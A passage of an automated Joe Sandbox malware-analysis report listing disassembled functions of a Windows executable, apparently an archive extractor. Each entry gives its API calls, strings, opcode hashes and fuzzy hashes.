                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                        • String ID: ]
                                                        • API String ID: 1428510222-3352871620
                                                        • Opcode ID: 167604b5f0df72b06740ca993f35d2c5df04121dc076d528af12ba987f99282d
                                                        • Instruction ID: d9db3a9e523ee4ba1f674aee276b02047cf0ed43011ce588165d9c20b01e6206
                                                        • Opcode Fuzzy Hash: 167604b5f0df72b06740ca993f35d2c5df04121dc076d528af12ba987f99282d
                                                        • Instruction Fuzzy Hash: 78113D21B1964247EB24BF53E694379F691BF88BC0F980034DB6E47BC5EE2CE80486D0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7E92C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 1266772231-0
                                                        • Opcode ID: 7cff314f2ed7f30e3d95f64182e7aea28787e66a788d380f9b90687b6d32506f
                                                        • Instruction ID: e0ba10cfe4a95120bc968fafa69db353b3d97abbcd575063ff3574cea374b1a2
                                                        • Opcode Fuzzy Hash: 7cff314f2ed7f30e3d95f64182e7aea28787e66a788d380f9b90687b6d32506f
                                                        • Instruction Fuzzy Hash: 1CF0EC26A3895283EBA0AF22E895BB6B360FFD4705FC05435E75E418D4EF2CD109CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D75384 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2402 7ff7f4d75384-7ff7f4d753ca call 7ff7f4d64a70 2403 7ff7f4d753d0-7ff7f4d753dd 2402->2403 2404 7ff7f4d7562d 2403->2404 2405 7ff7f4d753e3-7ff7f4d753e6 2403->2405 2407 7ff7f4d7562f-7ff7f4d75656 call 7ff7f4d85bf0 2404->2407 2405->2404 2406 7ff7f4d753ec-7ff7f4d753ef 2405->2406 2406->2404 2409 7ff7f4d753f5-7ff7f4d753fe 2406->2409 2409->2404 2411 7ff7f4d75404-7ff7f4d7540d 2409->2411 2411->2404 2412 7ff7f4d75413-7ff7f4d7544d call 7ff7f4d66288 2411->2412 2415 7ff7f4d7545a-7ff7f4d75471 2412->2415 2416 7ff7f4d7544f-7ff7f4d75453 2412->2416 2417 7ff7f4d754c9-7ff7f4d754d0 2415->2417 2418 7ff7f4d75473-7ff7f4d7547a 2415->2418 2416->2415 2420 7ff7f4d754da-7ff7f4d754e4 2417->2420 2421 7ff7f4d754d2-7ff7f4d754d5 call 7ff7f4d71d98 2417->2421 2419 7ff7f4d7547c-7ff7f4d754c7 call 7ff7f4d71bbc call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d68d18 2418->2419 2418->2420 2419->2420 2424 7ff7f4d754f7-7ff7f4d7550a call 7ff7f4d74e30 2420->2424 2425 7ff7f4d754e6-7ff7f4d754ee 2420->2425 2421->2420 2430 7ff7f4d755f5-7ff7f4d755fd 2424->2430 2431 7ff7f4d75510-7ff7f4d75560 call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d700d0 2424->2431 2425->2424 2430->2404 2435 7ff7f4d755ff-7ff7f4d75611 2430->2435 2452 7ff7f4d75594-7ff7f4d755b4 2431->2452 2453 7ff7f4d75562-7ff7f4d75574 2431->2453 2438 7ff7f4d75628 call 7ff7f4d85adc 2435->2438 2439 7ff7f4d75613-7ff7f4d75626 2435->2439 2438->2404 2439->2438 2442 7ff7f4d75657-7ff7f4d7565c call 7ff7f4d8ae54 2439->2442 2449 7ff7f4d7565d-7ff7f4d75663 call 7ff7f4d8ae54 2442->2449 2459 7ff7f4d755b6-7ff7f4d755be 2452->2459 2460 7ff7f4d755f3 2452->2460 2455 7ff7f4d75576-7ff7f4d75589 2453->2455 2456 7ff7f4d7558f call 7ff7f4d85adc 2453->2456 2455->2449 2455->2456 2456->2452 2461 7ff7f4d755ee-7ff7f4d755f1 2459->2461 2462 7ff7f4d755c0-7ff7f4d755d2 2459->2462 2460->2430 2461->2407 2463 7ff7f4d755e9 call 7ff7f4d85adc 2462->2463 2464 7ff7f4d755d4-7ff7f4d755e7 2462->2464 2463->2461 2464->2442 2464->2463
                                                        APIs
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D75657
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D7565D
                                                          • Part of subcall function 00007FF7F4D66288: FindClose.KERNELBASE(?,?,?,00007FF7F4D6FF61), ref: 00007FF7F4D662BD
                                                          • Part of subcall function 00007FF7F4D71D98: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F4D71DED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
                                                        • String ID: zip$zipx
                                                        • API String ID: 2713956076-1268445101
                                                        • Opcode ID: 350b18cfa5000158da6409a18723ffc0cc97e648f0802e28871945a013b048c9
                                                        • Instruction ID: 9113be76405b31f429f4f53491a4b031da2e56153bce29932bda6a49b2e2f754
                                                        • Opcode Fuzzy Hash: 350b18cfa5000158da6409a18723ffc0cc97e648f0802e28871945a013b048c9
                                                        • Instruction Fuzzy Hash: 3B815E62B19A0686FB10AF67E8D41BCB361BB44B94F904235DB3C56BD5DE3CA446C2A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7CDE4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                        • String ID: EDIT
                                                        • API String ID: 4243998846-3080729518
                                                        • Opcode ID: 57866ba5747fa0bc54567b454ab76e14fed8a2762cd959d95fef1a34dd28749e
                                                        • Instruction ID: 1afc63fbbb4a72625cc284c14fc8043b32921da2993cddda87323948cf9d06c0
                                                        • Opcode Fuzzy Hash: 57866ba5747fa0bc54567b454ab76e14fed8a2762cd959d95fef1a34dd28749e
                                                        • Instruction Fuzzy Hash: 18016211B18A8687FB20AF13E8917B5B390BF98B90FC41035CB6D466D5EE2CD144C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D64E18 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$Handle
                                                        • String ID:
                                                        • API String ID: 4209713984-0
                                                        • Opcode ID: 198ec95fdca56b07638f3989dee28626353a88267a5440f38149c32074972865
                                                        • Instruction ID: 17f8f496aabaf8963cd7f82a42a65e824997547f21609bdb9a03ce507d60426d
                                                        • Opcode Fuzzy Hash: 198ec95fdca56b07638f3989dee28626353a88267a5440f38149c32074972865
                                                        • Instruction Fuzzy Hash: 1751C622B19A46E3EB10AF16D984379B360FB44BA4F804135EB2D46AD5DF7CE484C794
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D700DC Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                        • String ID:
                                                        • API String ID: 3750147219-0
                                                        • Opcode ID: ff066cf56c5e69ddb7090736cc2ebf1f58eb2cd748bbb34f3e06e5bd728184c4
                                                        • Instruction ID: 5fa6ec5686edea0a77c8b9753b0faaf462896758e39697c0f3d8099d5b90fe7f
                                                        • Opcode Fuzzy Hash: ff066cf56c5e69ddb7090736cc2ebf1f58eb2cd748bbb34f3e06e5bd728184c4
                                                        • Instruction Fuzzy Hash: 8951A162F14A5186FF00AFA6D4843BDB322BB45BA4F940635DB3C16BD6DF6DE44183A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D864FC Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 1452418845-0
                                                        • Opcode ID: 4d6aa7c42a5cbf6dc14c95ac2672eed8dd3b5ce1cb67293262dad9321be47a97
                                                        • Instruction ID: 86009aebc825fd2d4955cbcc18574e2025a0e83877a93b034ae02af1a4bfef3a
                                                        • Opcode Fuzzy Hash: 4d6aa7c42a5cbf6dc14c95ac2672eed8dd3b5ce1cb67293262dad9321be47a97
                                                        • Instruction Fuzzy Hash: 39311220A0924647FB64BF27D8D63B9B280BF51794FC44079EB2E4B3D7DE2CA40582E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D65C60 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2359106489-0
                                                        • Opcode ID: c27b3ec1c54589369261def9b82eaca4eaf4addb5aa5b689ce4d6dc2e2751d6c
                                                        • Instruction ID: 8762afcf04e1576328eb789f5843fcf4367cb2910aa94b2191adfde0b7a63170
                                                        • Opcode Fuzzy Hash: c27b3ec1c54589369261def9b82eaca4eaf4addb5aa5b689ce4d6dc2e2751d6c
                                                        • Instruction Fuzzy Hash: 84319422A18A46D3FB20AF26F4E927DB351FB85790FD50231EBAD426D5DF2CD4818690
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D64520 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$FileHandleRead
                                                        • String ID:
                                                        • API String ID: 2244327787-0
                                                        • Opcode ID: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                        • Instruction ID: 2b4ef10cce43d8e71f1f8daab8db07d23dd28a17db3dcf7dd27ca0142fd6fee4
                                                        • Opcode Fuzzy Hash: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                        • Instruction Fuzzy Hash: 7D21A431A09A41D3EB20AF12E488239F3A2FB45B94F940534DB7D466C4CF2CD8C487A8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D776C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00007FF7F4D66288: FindClose.KERNELBASE(?,?,?,00007FF7F4D6FF61), ref: 00007FF7F4D662BD
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D779A3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                        • String ID: W#b$W?f
                                                        • API String ID: 1011579015-2742597119
                                                        • Opcode ID: 352ae3d9a26d2a457df53a5ef33b8a5a4490cce2cfa98d381cf5629f47d6954f
                                                        • Instruction ID: 519b314e613b1fc11e38e750dc82323920798dd298be7b9159939523e6b068d9
                                                        • Opcode Fuzzy Hash: 352ae3d9a26d2a457df53a5ef33b8a5a4490cce2cfa98d381cf5629f47d6954f
                                                        • Instruction Fuzzy Hash: 21812B21E2968687FB60BF16E8C4378B291BB85794F940576CB6C422D6DF6CF44183E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7D068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: DirectoryInitializeMallocSystem
                                                        • String ID: riched20.dll
                                                        • API String ID: 174490985-3360196438
                                                        • Opcode ID: ce54fd95b305845c0f126beafaeebcdb2a2a85b3ca0306bee3d0e45aa5b04219
                                                        • Instruction ID: 797f839d194f7ac071600dc4199e3eb4e96b4990cfa65afea742ccb35636e1da
                                                        • Opcode Fuzzy Hash: ce54fd95b305845c0f126beafaeebcdb2a2a85b3ca0306bee3d0e45aa5b04219
                                                        • Instruction Fuzzy Hash: C8F04471618A4583EB10AF51F4942AAF3A0FB44754F804135E79D427D4EF7CD148CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D64334 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2272807158-0
                                                        • Opcode ID: 49bf7ce20726a0889fef4cdf1579c121035760373733be60429eb0e546bfa457
                                                        • Instruction ID: 82e01e0e66e4252948f754015142c5b1daedaa7a99bf51d838197cf9b0eb1d16
                                                        • Opcode Fuzzy Hash: 49bf7ce20726a0889fef4cdf1579c121035760373733be60429eb0e546bfa457
                                                        • Instruction Fuzzy Hash: 7441C322608B8593EB10AF16E485269B3A1FB807B4F505334DFBD03AD5CF7CE4908754
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D61FF8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2176759853-0
                                                        • Opcode ID: ec1e57a6202b58da56488acc7b812840dc01756244e031809576c21705179a55
                                                        • Instruction ID: 4ef6d9cc6c20dea9d7956fd818784dcb7ded743335c9fc4a6643ae961b022436
                                                        • Opcode Fuzzy Hash: ec1e57a6202b58da56488acc7b812840dc01756244e031809576c21705179a55
                                                        • Instruction Fuzzy Hash: A9218162629B8582EB10AF66E48016EB364FB89BD0F545235EBAD03BD5DF3CD180C780
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D65FF4 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1203560049-0
                                                        • Opcode ID: 028a4167d2e2c338756a5db1a567916fab5ba0e441f1551a14ba84670f1114d1
                                                        • Instruction ID: 7a1034131d6a196b941a417cadbe8fdb9308ba270489f014eb2684622a9ee545
                                                        • Opcode Fuzzy Hash: 028a4167d2e2c338756a5db1a567916fab5ba0e441f1551a14ba84670f1114d1
                                                        • Instruction Fuzzy Hash: 7321FB22B18B8593EB20AF16E4D526DB361FF88B94F904230EBAD427D5DF3CD544CA90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D65790 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
